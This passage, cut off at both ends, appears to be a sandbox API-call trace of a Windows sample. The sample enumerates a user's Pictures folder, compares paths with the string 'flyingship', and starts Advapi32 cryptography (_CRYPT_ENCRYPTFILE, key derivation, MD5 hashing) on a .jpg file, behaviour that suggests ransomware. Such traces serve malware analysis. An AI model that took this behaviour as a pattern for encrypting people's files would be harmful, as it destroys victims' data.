ftCreationTime.dwHighDateTime=0x1d5dfc7, ftLastAccessTime.dwLowDateTime=0x1a5beaa0, ftLastAccessTime.dwHighDateTime=0x1d5d9e4, ftLastWriteTime.dwLowDateTime=0x1a5beaa0, ftLastWriteTime.dwHighDateTime=0x1d5d9e4, nFileSizeHigh=0x0, nFileSizeLow=0xa27d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="f2JFy_.jpg", cAlternateFileName="")) returned 0x90add8 [0190.434] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0190.434] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.434] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe51b8690, ftCreationTime.dwHighDateTime=0x1d5dfc7, ftLastAccessTime.dwLowDateTime=0x1a5beaa0, ftLastAccessTime.dwHighDateTime=0x1d5d9e4, ftLastWriteTime.dwLowDateTime=0x1a5beaa0, ftLastWriteTime.dwHighDateTime=0x1d5d9e4, nFileSizeHigh=0x0, nFileSizeLow=0xa27d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="f2JFy_.jpg", cAlternateFileName="")) returned 0x90add8 [0190.434] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0190.434] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xg0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oop8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yh\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2JFy_.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.436] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.436] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0190.436] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0190.436] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.437] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.437] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.437] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.437] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.437] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.437] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe51b8690, ftCreationTime.dwHighDateTime=0x1d5dfc7, ftLastAccessTime.dwLowDateTime=0x1a5beaa0, ftLastAccessTime.dwHighDateTime=0x1d5d9e4, ftLastWriteTime.dwLowDateTime=0x1a5beaa0, ftLastWriteTime.dwHighDateTime=0x1d5d9e4, nFileSizeHigh=0x0, nFileSizeLow=0xa27d, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="f2JFy_.jpg", cAlternateFileName="")) returned 0x90af58 [0190.437] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0190.437] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.438] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.438] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.438] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.438] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0190.438] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.438] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0190.438] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.438] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.438] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0190.438] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.438] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.438] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.438] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.438] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.438] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0190.438] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.438] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0190.439] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.439] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.439] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0190.440] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.440] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.440] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.440] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.440] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.440] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.440] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.440] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0190.440] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.453] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.454] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.454] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.454] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0190.454] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.454] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.454] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.454] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.454] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.454] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0190.454] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.454] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.454] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.454] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.454] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0190.454] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.454] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.454] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.454] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.454] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.454] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.454] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.455] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.455] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0190.455] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.455] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.455] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.455] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.455] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0190.455] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.455] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.455] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.455] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0190.455] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.455] CryptHashData (hHash=0x90ae18, pbData=0x8dec18, dwDataLen=0x19, dwFlags=0x1) returned 1 [0190.455] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 